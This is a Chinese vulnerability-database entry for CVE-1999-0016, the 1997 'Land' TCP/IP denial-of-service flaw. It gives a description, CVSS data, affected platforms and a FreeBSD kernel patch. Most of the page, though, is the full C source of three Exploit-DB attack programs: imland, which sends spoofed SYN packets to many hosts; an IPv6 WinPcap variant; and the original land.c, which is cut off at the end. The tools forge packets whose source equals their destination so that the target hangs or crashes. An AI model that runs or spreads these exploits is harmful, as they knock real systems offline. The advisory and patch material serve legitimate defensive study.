CVE-1999-0016
CVSS5.0
发布时间 :1997-12-01 00:00:00
修订时间 :2008-09-09 08:33:32
NMCOES    

[原文]Land IP denial of service.


[CNNVD]多家厂商TCP/IP实现处理相同源、目标IP数据包失败拒绝服务攻击漏洞(CNNVD-199712-002)

        
        TCP/IP网络协议栈是大多数操作系统均实现的用于Internet联网的最被广为使用的网络协议。
        早期BSD派生系统(Linux除外)及Windows系统TCP/IP协议栈实现上存在漏洞,远程攻击者可以利用此漏洞对服务器进行拒绝服务攻击。
        发送一个源地址和目标地址相同,源端口和目的端口也相同的SYN包到有漏洞的目标系统,这就是著名的Land攻击。由于TCP/IP实现上的问题,目标系统对此种畸形包的处理可能会出问题。不同的系统对Land攻击反应不同,许多老版本的UNIX类操作系统将崩溃,NT的CPU资源占用将接近100%(大约持续五分钟)。
        此漏洞相关信息在新闻组和邮件列表中可以用"Land denial of service"、"Land Attack"为关键字搜索到。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_95Microsoft Windows 95
cpe:/o:hp:hp-ux:10.24HP HP-UX 10.24
cpe:/o:netbsd:netbsd:1.1NetBSD 1.1
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:netbsd:netbsd:1.0NetBSD 1.0
cpe:/a:microsoft:winsock:2.0Microsoft WinSock 2.0
cpe:/o:hp:hp-ux:10.16HP HP-UX 10.16
cpe:/o:hp:hp-ux:10.10HP HP-UX 10.10
cpe:/o:hp:hp-ux:9.07HP HP-UX 9.7
cpe:/a:gnu:inet:5.01
cpe:/o:hp:hp-ux:9.05HP HP-UX 9.05
cpe:/o:sun:sunos:4.1.3u1Sun SunOS 4.1.3u1
cpe:/o:cisco:ios:7000
cpe:/o:hp:hp-ux:10.30HP HP-UX 10.30
cpe:/o:hp:hp-ux:9.00HP HP-UX 9.0
cpe:/o:hp:hp-ux:9.04HP HP-UX 9.4
cpe:/o:hp:hp-ux:9.01HP HP-UX 9.01
cpe:/o:sun:sunos:4.1.4Sun SunOS 4.1.4
cpe:/o:microsoft:windows_nt:4.0Microsoft Windows NT 4.0
cpe:/o:hp:hp-ux:9.03HP HP-UX 9.3
cpe:/o:hp:hp-ux:10.00HP HP-UX 10.00
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/o:hp:hp-ux:10.01HP HP-UX 10.01

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5835Multiple OS TCP/IP DoS Vulnerabilities
oval:org.mitre.oval:def:5727A TCP SYN packet with target host's address as both source and destination can cause system hangs.
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0016
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0016
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199712-002
(官方数据源) CNNVD

- 其它链接及资源

http://www1.itrc.hp.com/service/cki/docDisplay.do?docId=HPSBUX9801-076
(UNKNOWN)  HP  HPSBUX9801-076

- 漏洞信息

多家厂商TCP/IP实现处理相同源、目标IP数据包失败拒绝服务攻击漏洞
中危 未知
1997-12-01 00:00:00 2006-11-16 00:00:00
远程  
        
        TCP/IP网络协议栈是大多数操作系统均实现的用于Internet联网的最被广为使用的网络协议。
        早期BSD派生系统(Linux除外)及Windows系统TCP/IP协议栈实现上存在漏洞,远程攻击者可以利用此漏洞对服务器进行拒绝服务攻击。
        发送一个源地址和目标地址相同,源端口和目的端口也相同的SYN包到有漏洞的目标系统,这就是著名的Land攻击。由于TCP/IP实现上的问题,目标系统对此种畸形包的处理可能会出问题。不同的系统对Land攻击反应不同,许多老版本的UNIX类操作系统将崩溃,NT的CPU资源占用将接近100%(大约持续五分钟)。
        此漏洞相关信息在新闻组和邮件列表中可以用"Land denial of service"、"Land Attack"为关键字搜索到。
        

- 公告与补丁

        厂商补丁:
        FreeBSD
        -------
        FreeBSD已经为此发布了一个安全公告(SA-98:01)以及相应补丁:
        SA-98:01:LAND attack can cause harm to running FreeBSD systems
        链接:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/SA-98:01.asc
        补丁下载:
        Apply the enclosed patch. There are two patches, one for FreeBSD
         -current, and another for FreeBSD 2.2-stable.
         patch for -current prior to Jan 21, 1998. Found in land-current.
         Index: tcp_input.c
         ===================================================================
         RCS file: /home/imp/FreeBSD/CVS/src/sys/netinet/tcp_input.c,v
         retrieving revision 1.67
         retrieving revision 1.68
         diff -u -r1.67 -r1.68
         --- tcp_input.c 1997/12/19 23:46:15 1.67
         +++ tcp_input.c 1998/01/21 02:05:59 1.68
         @@ -626,6 +613,7 @@
         * If the state is LISTEN then ignore segment if it contains an RST.
         * If the segment contains an ACK then it is bad and send a RST.
         * If it does not contain a SYN then it is not interesting; drop it.
         + * If it is from this socket, drop it, it must be forged.
         * Don't bother responding if the destination was a broadcast.
         * Otherwise initialize tp->rcv_nxt, and tp->irs, select an initial
         * tp->iss, and send a segment:
         @@ -644,6 +632,9 @@
         goto dropwithreset;
         if ((tiflags & TH_SYN) == 0)
         goto drop;
         + if ((ti->ti_dport == ti->ti_sport) &&
         + (ti->ti_dst.s_addr == ti->ti_src.s_addr))
         + goto drop;
         /*
         * RFC1122 4.2.3.10, p. 104: discard bcast/mcast SYN
         * in_broadcast() should never return true on a received
         @@ -762,6 +753,23 @@
         }
        
         /*
         + * If the state is SYN_RECEIVED:
         + * if seg contains SYN/ACK, send a RST.
         + * if seg contains an ACK, but not for our SYN/ACK, send a RST.
         + */
         + case TCPS_SYN_RECEIVED:
         + if (tiflags & TH_ACK) {
         + if (tiflags & TH_SYN) {
         + tcpstat.tcps_badsyn++;
         + goto dropwithreset;
         + }
         + if (SEQ_LEQ(ti->ti_ack, tp->snd_una) ||
         + SEQ_GT(ti->ti_ack, tp->snd_max))
         + goto dropwithreset;
         + }
         + break;
         +
         + /*
         * If the state is SYN_SENT:
         * if seg contains an ACK, but not for our SYN, drop the input.
         * if seg contains a RST, then drop the connection.
         @@ -1176,14 +1184,11 @@
         switch (tp->t_state) {
        
         /*
         - * In SYN_RECEIVED state if the ack ACKs our SYN then enter
         - * ESTABLISHED state and continue processing, otherwise
         - * send an RST.
         + * In SYN_RECEIVED state, the ack ACKs our SYN, so enter
         + * ESTABLISHED state and continue processing.
         + * The ACK was checked above.
         */
         case TCPS_SYN_RECEIVED:
         - if (SEQ_GT(tp->snd_una, ti->ti_ack) ||
         - SEQ_GT(ti->ti_ack, tp->snd_max))
         - goto dropwithreset;
        
         tcpstat.tcps_connects++;
         soisconnected(so);
         patch for 2.2.5 and 2.2.5-stable before Jan 30, 1998 found in land-22
         Index: tcp_input.c
         ===================================================================
         RCS file: /home/imp/FreeBSD/CVS/src/sys/netinet/tcp_input.c,v
         retrieving revision 1.54.2.6
         retrieving revision 1.54.2.7
         diff -u -r1.54.2.6 -r1.54.2.7
         --- tcp_input.c 1997/11/20 21:45:34

- 漏洞信息 (20810)

FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1) (EDBID:20810)
multiple remote
1997-11-20 Verified
0 m3lt
N/A [点击下载]
source: http://www.securityfocus.com/bid/2666/info

A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.

It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.

**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. 

/*
 * imland - improved multiple land
 *
 * A good spanking session requires several good, hard slaps.
 *
 * This program lands multiple land attacks on multiple hosts as a
 * proof of concept of the oldly discovered but newly resurfaced
 * M$ `land' attack vulnerability. It was written without ill intent to
 * test a large range of servers for vulnerabilities in one go.
 *
 * If the targeted machines freeze up for 5-30 seconds for each packet,
 * that means they are vulnerable.
 *
 * Disclaimer:
 * This program was written without ill intent. It was designed to test
 * and prove the effects of the LAND attack on multiple hosts at once.
 * I am in no way responsible for what you do with this piece of code.
 *
 * Please use it responsibly to test your own servers only.
 *
 */

#define _BSD_SOURCE
#define __FAVOR_BSD

#include <stdio.h>
#include <ctype.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdarg.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>


/* the attack packet */
struct raw_tcp_packet {
	struct ip ip;
	struct tcphdr tcp;
};

/* required to make the TCP checksum correct */
struct tcp_chksum_hdr {
	struct in_addr src;
	struct in_addr dest;
	u_char zero;
	u_char proto;
	u_short len;
	struct tcphdr tcp;
};

/* linked list with all we need, really */
typedef struct target {
	struct sockaddr_in sa;
	struct {
		struct iphdr ip;    /* included here so we can build them once */
		struct tcphdr tcp;  /* and thus transmit a tiny bit faster */
	} pkt;
	struct target *next;
} target;

/** prototypes **/
int send_land(int, struct target *);
void u_sleep(u_int);
int add_target_ip(char *, struct in_addr *, u_short);
u_int get_timevar(const char *);
int add_target(char *);
unsigned short chksum(unsigned short *, int);
void finish(int);
void crash(const char *, ...);
void usage(void);

/** external **/
extern int optind, opterr, optopt;
extern int h_errno;
extern char *optarg;
extern char *__progname;

/** global variables **/
target *list = NULL, *cursor = NULL;
int targets = 0;
int pkt_interval = 0; /* no delay by default */
int pkts = 1, pkts_sent = 0;  /* send one per host by default */
int debug = 0;
u_short defport = 139; /* default port */

/** code start **/
void crash(const char *fmt, ...)
{
	va_list ap;

	printf("%s: ", __progname);

	va_start(ap, fmt);
	vprintf(fmt, ap);
	va_end(ap);

	if(errno) printf(": %s", strerror(errno));
	puts("");

	exit(3);
}

int main(int argc, char **argv)
{
	target *host;
	int sock, foo;

	if((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
		crash("socket()");

	while((foo = getopt(argc, argv, "v:i:p:n:")) != EOF) {
		switch(foo) {
		case 'v':
			debug++;
			break;
		case 'i':
			pkt_interval = get_timevar(optarg);
			break;
		case 'p':
			defport = (u_short)strtoul(optarg, NULL, 0);
			break;
		case 'n':
			pkts = strtoul(optarg, NULL, 0);
			if(debug) printf("Sending %d packets\n", pkts);
			break;
		default:
			add_target(optarg);
			break;
		}
	}

	argv = &argv[optind];
	while(*argv) {
		add_target(*argv);
		argv++;
	}
	
	if(!targets) usage();

	while(!pkts || pkts > pkts_sent) {
		host = list;
		while(host) {
			printf("Sending to %s:%u ... ",
				   inet_ntoa(host->sa.sin_addr),
				   host->sa.sin_port);
			foo = send_land(sock, host);
			if(foo == - 1) printf("failed - %s\n", strerror(errno));
			else printf("ok, landed %d bytes\n", foo);

			if(pkt_interval) u_sleep(pkt_interval);

			host = host->next;
		}
		pkts_sent++;
	}

	return 0;
}

/* build and send the land attack packet */
int send_land(int sock, struct target *host)
{
	struct raw_tcp_packet pkt;
	struct tcp_chksum_hdr tcc;

	memset(&pkt, 0, sizeof(pkt));
	memset(&tcc, 0, sizeof(tcc));

	/* ip options */
	pkt.ip.ip_v = IPVERSION;
	pkt.ip.ip_hl = sizeof(struct iphdr) / 4;
	pkt.ip.ip_tos = 0;
	pkt.ip.ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr));
	pkt.ip.ip_off = htons(IP_DF);
	pkt.ip.ip_ttl = 0xff;
	pkt.ip.ip_p = IPPROTO_TCP;
	pkt.ip.ip_src = pkt.ip.ip_dst = host->sa.sin_addr;
	pkt.ip.ip_sum = chksum((u_short *)&pkt.ip, sizeof(struct iphdr));

	tcc.src = tcc.dest = host->sa.sin_addr;
	tcc.zero = 0;
	tcc.proto = IPPROTO_TCP;
	tcc.len = htons(sizeof(struct tcphdr));

	tcc.tcp.th_sport = tcc.tcp.th_dport = htons(host->sa.sin_port);
	tcc.tcp.th_seq = htons(0x1d1);
	tcc.tcp.th_off = sizeof(struct ip) / 4;
	tcc.tcp.th_flags = TH_SYN;
	tcc.tcp.th_win = htons(512);

	memcpy(&pkt.tcp, &tcc.tcp, sizeof(struct tcphdr));
	pkt.tcp.th_sum = chksum((u_short *)&tcc, sizeof(tcc));
	return sendto(sock, &pkt, sizeof(pkt), 0, (struct sockaddr *)&host->sa,
				  sizeof(struct sockaddr_in));
}

/* calculate checksum */
u_short chksum(u_short *p, int n)
{
	register long sum = 0;

	while(n > 1) {
		sum += *p++;
		n -= 2;
	}
	/* mop up the occasional odd byte */
	if(n == 1) sum += *(u_char *)p;

	sum = (sum >> 16) + (sum & 0xffff);	/* add hi 16 to low 16 */
	sum = sum + (sum >> 16);            /* add carry */
	return ~sum;                        /* ones-complement, truncate */
}

/* usleep() the portable way. No error checking is done,
 * so this might theoretically fail. */
void u_sleep(u_int u_sec)
{
	struct timeval to;
	fd_set readset, writeset;

	if(debug > 3) printf("sleeping for %u microseconds\n", u_sec);
	if(!u_sec) return;

	to.tv_sec = u_sec / 1000000;
	to.tv_usec = u_sec % 1000000;
	FD_ZERO(&writeset);
	FD_ZERO(&readset);
	select(0, &readset, &writeset, NULL, &to);

	return;
}

int add_target_ip(char *arg, struct in_addr *in, u_short port)
{
	struct target *host;

	/* disregard obviously stupid addresses */
	if(in->s_addr == INADDR_NONE || in->s_addr == INADDR_ANY)
		return -1;

	if(debug) printf("Adding %s:%u to target list\n", inet_ntoa(*in), port);

	/* add the fresh ip */
	host = malloc(sizeof(struct target));
	if(!host) {
		crash("add_target_ip(%s, %s): malloc(%d) failed",
			  arg, inet_ntoa(*in), sizeof(struct target));
	}
	memset(host, 0, sizeof(struct target));

	/* fill out the sockaddr_in struct */
	host->sa.sin_family = AF_INET;
	host->sa.sin_addr.s_addr = in->s_addr;
	host->sa.sin_port = port ? port : defport;

	if(!list) list = host;
	else cursor->next = host;

	cursor = host;
	targets++;

	return 0;
}

/* wrapper for add_target_ip to resolve stuff as well */
int add_target(char *arg)
{
	int i;
	struct hostent *he;
	struct in_addr *in, ip;
	char *port_str;
	u_short port = 0;

	if(!arg) return -1;
	
	if((port_str = strchr(arg, ':'))) {
		*port_str = '\0';
		port_str++;
		if(*port_str) port = (u_short)strtoul(port_str, NULL, 0);
	}

	/* don't resolve if we don't have to */
	if(inet_aton(arg, &ip)) return add_target_ip(arg, &ip, port);

	/* not an IP, so resolve */
	errno = 0;
	he = gethostbyname(arg);
	if(!he && h_errno == TRY_AGAIN) {
		u_sleep(500000);
		he = gethostbyname(arg);
	}

	if(!he) crash("Failed to resolve %s: %s", arg, hstrerror(h_errno));

	/* add all the IP's as targets */
	for(i = 0; he->h_addr_list[i]; i++) {
		in = (struct in_addr *)he->h_addr_list[i];
		add_target_ip(arg, in, port);
	}

	return 0;
}

/*
 * u = micro
 * m = milli
 * s = seconds
 * return value is in microseconds
 */
u_int get_timevar(const char *str)
{
	char p, u, *ptr;
	unsigned int len;
	u_int i, d;	            /* integer and decimal, respectively */
	u_int factor = 1000;    /* default to milliseconds */

	if(!str) return 0;
	len = strlen(str);
	if(!len) return 0;

	/* unit might be given as ms|m (millisec),
	 * us|u (microsec) or just plain s, for seconds */
	u = p = '\0';
	u = str[len - 1];
	if(len >= 2 && !isdigit((int)str[len - 2])) p = str[len - 2];
	if(p && u == 's') u = p;
	else if(!p) p = u;
	if(debug > 3) printf("evaluating %s, u: %c, p: %c\n", str, u, p);

	if(u == 'u') factor = 1;            /* microseconds */
	else if(u == 'm') factor = 1000;	/* milliseconds */
	else if(u == 's') factor = 1000000;	/* seconds */
	if(debug > 3) printf("factor is %u\n", factor);

	i = strtoul(str, &ptr, 0);
	if(!ptr || *ptr != '.' || strlen(ptr) < 2 || factor == 1)
		return i * factor;

	/* time specified in usecs can't have decimal points, so ignore them */
	if(factor == 1) return i;

	d = strtoul(ptr + 1, NULL, 0);

	/* d is decimal, so get rid of excess baggage */
	while(d >= factor) d /= 10;

	/* the last parenthesis avoids floating point exceptions. */
	return ((i * factor) + (d * (factor / 10)));
}

void usage(void)
{
	printf("Usage: %s -i <interval> -p <port> -n <pkts> host1:port1 hostn:portn\n\n",
		   __progname);

	printf("-i sets packet interval in milliseconds.\n");
	printf("   You can specify Nus for N microseconds, or Ns for N seconds.\n");
	printf("   Default is 0, which is good for multiple hosts and one packet.\n");
	printf("   If you want to send continuously, specify 1s or more, so as to not\n");
	printf("   cause DoS due to sheer traffic volume.\n\n");
	printf("-p sets the DEFAULT port (139 if not specified)\n\n");
	printf("-n determines how many packets to send to each target. Default is 1\n\n");
	printf("host:port combinations can be given as such; 207.46.130.108:80\n");
	printf("The port part of a target definition ovverrides the defaults.\n\n");
	printf("Hostnames will be resolved, if possible.\n");

	exit(1);
}
		

- 漏洞信息 (20811)

FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (2) (EDBID:20811)
multiple remote
1997-11-20 Verified
0 Konrad Malewski
N/A [点击下载]
source: http://www.securityfocus.com/bid/2666/info
 
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
 
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
 
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. 

//
// Example usage: LandIpV6 \Device\NPF_{B1751317-BAA0-43BB-A69B-A0351960B28D} fe80::2a1:b0ff:fe08:8bcc 135
//
// Written by: Konrad Malewski.
//

#include <stdlib.h>
#include <stdio.h>
#include <Winsock2.h>
#include <ws2tcpip.h>
#include <pcap.h>
#include <remote-ext.h>
///////////////////////////////////////////////////////////////////////////////
///////////// from libnet /////////////
/* ethernet addresses are 6 octets long */
#define ETHER_ADDR_LEN      0x6

typedef unsigned char  u_int8_t;
typedef unsigned short u_int16_t;
typedef unsigned int   u_int32_t;
typedef unsigned __int64 u_int64_t;
/*
*  Ethernet II header
*  Static header size: 14 bytes
*/
struct libnet_ethernet_hdr
{
  u_int8_t  ether_dhost[ETHER_ADDR_LEN];/* destination ethernet address */
  u_int8_t  ether_shost[ETHER_ADDR_LEN];/* source ethernet address */
  u_int16_t ether_type;                 /* protocol */
};

struct libnet_in6_addr
{
  union
  {
    u_int8_t   __u6_addr8[16];
    u_int16_t  __u6_addr16[8];
    u_int32_t  __u6_addr32[4];
  } __u6_addr;            /* 128-bit IP6 address */
};


/*
*  IPv6 header
*  Internet Protocol, version 6
*  Static header size: 40 bytes
*/
struct libnet_ipv6_hdr
{
  u_int8_t ip_flags[4];     /* version, traffic class, flow label */
  u_int16_t ip_len;         /* total length */
  u_int8_t ip_nh;           /* next header */
  u_int8_t ip_hl;           /* hop limit */
  struct libnet_in6_addr ip_src, ip_dst; /* source and dest address */

};

/*
*  TCP header
*  Transmission Control Protocol
*  Static header size: 20 bytes
*/
struct libnet_tcp_hdr
{
  u_int16_t th_sport;       /* source port */
  u_int16_t th_dport;       /* destination port */
  u_int32_t th_seq;          /* sequence number */
  u_int32_t th_ack;          /* acknowledgement number */
  u_int8_t th_x2:4,         /* (unused) */
th_off:4;        /* data offset */

  u_int8_t  th_flags;       /* control flags */
  u_int16_t th_win;         /* window */
  u_int16_t th_sum;         /* checksum */
  u_int16_t th_urp;         /* urgent pointer */
};

int libnet_in_cksum(u_int16_t *addr, int len)
{
  int sum;
  union
  {
    u_int16_t s;
    u_int8_t b[2];
  }pad;
  sum = 0;
  while (len > 1)
  {
    sum += *addr++;
    len -= 2;
  }
  if (len == 1)
  {
    pad.b[0] = *(u_int8_t *)addr;
    pad.b[1] = 0;
    sum += pad.s;
  }
  return (sum);
}
#define LIBNET_CKSUM_CARRY(x) (x = (x >> 16) + (x & 0xffff), (~(x + (x >> 16)) & 0xffff))

///////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
u_char packet[74];
struct libnet_ipv6_hdr *ip6_hdr = (libnet_ipv6_hdr *) (packet + 14);
struct libnet_tcp_hdr *tcp_hdr = (libnet_tcp_hdr *) (packet + 54);
struct libnet_ethernet_hdr *eth_hdr = (libnet_ethernet_hdr *) packet;

u_char errbuf[1024];
pcap_t *pcap_handle;


void usage(char* n)
{
  pcap_if_t * alldevs,*d;
  int i=1;
  fprintf(stdout,"Usage:\n"
    "\t %s <device> <victim> <port>\n",n);

  if (pcap_findalldevs (&alldevs, (char*)errbuf) == -1)
  {
    fprintf( stderr, "Error in pcap_findalldevs ():%s\n" ,errbuf);
    exit(EXIT_FAILURE);
  }
  printf("Avaliable adapters: \n");
  d = alldevs;
  while (d!=NULL)
  {
    printf("\t%d) %s\n\t\t%s\n",i++,d->name,d->description);
    d = d->next;
  }
  pcap_freealldevs (alldevs);
}
///////////////////////////////////////////////////////////////////////////////
int main(int argc, char* argv[])
{
  if ( argc<4 )
  {
    usage(argv[0]);
    return EXIT_FAILURE;
  }

  int retVal;
  struct addrinfo hints,*addrinfo;

  ZeroMemory(&hints,sizeof(hints));

  WSADATA wsaData;
  if ( WSAStartup( MAKEWORD(2,2), &wsaData ) != NO_ERROR )
  {
    fprintf( stderr, "Error in WSAStartup():%d\n",WSAGetLastError());
    return EXIT_FAILURE;
  }
  //
  // Get MAC address of remote host (assume link local IpV6 address)
  //

  hints.ai_family = PF_INET6;
  hints.ai_socktype = SOCK_STREAM;
  hints.ai_protocol = IPPROTO_TCP;
  hints.ai_flags = AI_PASSIVE;

  retVal =  getaddrinfo(argv[2],0, &hints, &addrinfo);
  if ( retVal!=0 )
  {
    WSACleanup();
    fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError());
    exit(EXIT_FAILURE);
  }

  //
  // Open WinPCap adapter
  //
  if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 100, (char*)errbuf)) == NULL )
  {
    freeaddrinfo(addrinfo);
    WSACleanup();
    fprintf(stderr, "Error opening device: %s\n",argv[1]);
    return EXIT_FAILURE;
  }

  ZeroMemory(packet,sizeof(packet));
  struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;

  // fill ethernet header
  eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 00:something;
  eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];
  eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];
  eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];
  eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];
  eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];
  eth_hdr->ether_type = 0xdd86;


  // fill IP header
  // source ip == destination ip
  memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
  memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
  ip6_hdr->ip_hl = 255;
  ip6_hdr->ip_nh = IPPROTO_TCP;
  ip6_hdr->ip_len = htons (20);
  ip6_hdr->ip_flags[0] = 0x06 << 4;
  srand((unsigned int) time(0));
  // fill tcp header
  tcp_hdr->th_sport = tcp_hdr->th_dport =  htons (atoi(argv[3])); // source port equal to destination
  tcp_hdr->th_seq = rand();
  tcp_hdr->th_ack = rand();
  tcp_hdr->th_off = htons(5);
  tcp_hdr->th_win = rand();
  tcp_hdr->th_sum = 0;
  tcp_hdr->th_urp = htons(10);
  tcp_hdr->th_off = 5;
  tcp_hdr->th_flags = 2;
  // calculate tcp checksum
  int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);
  chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));
  chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct libnet_tcp_hdr));
  tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);
  // send data to wire
  retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));
  if ( retVal == -1 )
  {
    fprintf(stderr,"Error writing packet to wire!!\n");
  }
  //
  // close adapter, free mem.. etc..
  //
  pcap_close(pcap_handle);
  freeaddrinfo(addrinfo);
  WSACleanup();
  return EXIT_SUCCESS;
}

--
NTBugtraq Editor's Note:

Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
--
		

- 漏洞信息 (20812)

FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3) (EDBID:20812)
windows remote
1997-11-20 Verified
0 m3lt
N/A [点击下载]
source: http://www.securityfocus.com/bid/2666/info
  
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
  
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
  
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. 

/* land.c by m3lt, FLC
   crashes a win95 box */

#include <stdio.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>

struct pseudohdr
{
        struct in_addr saddr;
        struct in_addr daddr;
        u_char zero;
        u_char protocol;
        u_short length;
        struct tcphdr tcpheader;
};

u_short checksum(u_short * data,u_short length)
{
        register long value;
        u_short i;

        for(i=0;i<(length>>1);i++)
                value+=data[i];

        if((length&1)==1)
                value+=(data[i]<<8);

        value=(value&65535)+(value>>16);

        return(~value);
}

int main(int argc,char * * argv)
{
        struct sockaddr_in sin;
        struct hostent * hoste;
        int sock;
        char buffer[40];
        struct iphdr * ipheader=(struct iphdr *) buffer;
        struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
        struct pseudohdr pseudoheader;

        fprintf(stderr,"land.c by m3lt, FLC\n");

        if(argc<3)
        {
                fprintf(stderr,"usage: %s IP port\n",argv[0]);
                return(-1);
        }

        bzero(&sin,sizeof(struct sockaddr_in));
        sin.sin_family=AF_INET;

        if((hoste=gethostbyname(argv[1]))!=NULL)
                bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length);
        else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1)
        {
                fprintf(stderr,"unknown host %s\n",argv[1]);
                return(-1);
        }

        if((sin.sin_port=htons(atoi(argv[2])))==0)
        {
                fprintf(stderr,"unknown port %s\n",argv[2]);
                return(-1);
        }

        if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
        {
                fprintf(stderr,"couldn't allocate raw socket\n");
                return(-1);
        }

        bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->version=4;
        ipheader->ihl=sizeof(struct iphdr)/4;
        ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
        ipheader->id=htons(0xF1C);
        ipheader->ttl=255;
        ipheader->protocol=IP_TCP;
        ipheader->saddr=sin.sin_addr.s_addr;
        ipheader->daddr=sin.sin_addr.s_addr;

        tcpheader->th_sport=sin.sin_port;
        tcpheader->th_dport=sin.sin_port;
        tcpheader->th_seq=htonl(0xF1C);
        tcpheader->th_flags=TH_SYN;
        tcpheader->th_off=sizeof(struct tcphdr)/4;
        tcpheader->th_win=htons(2048);

        bzero(&pseudoheader,12+sizeof(struct tcphdr));
        pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
        pseudoheader.protocol=6;
        pseudoheader.length=htons(sizeof(struct tcphdr));
        bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
        tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));

        if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr),0,(struct sockaddr *) &sin,sizeof(struct
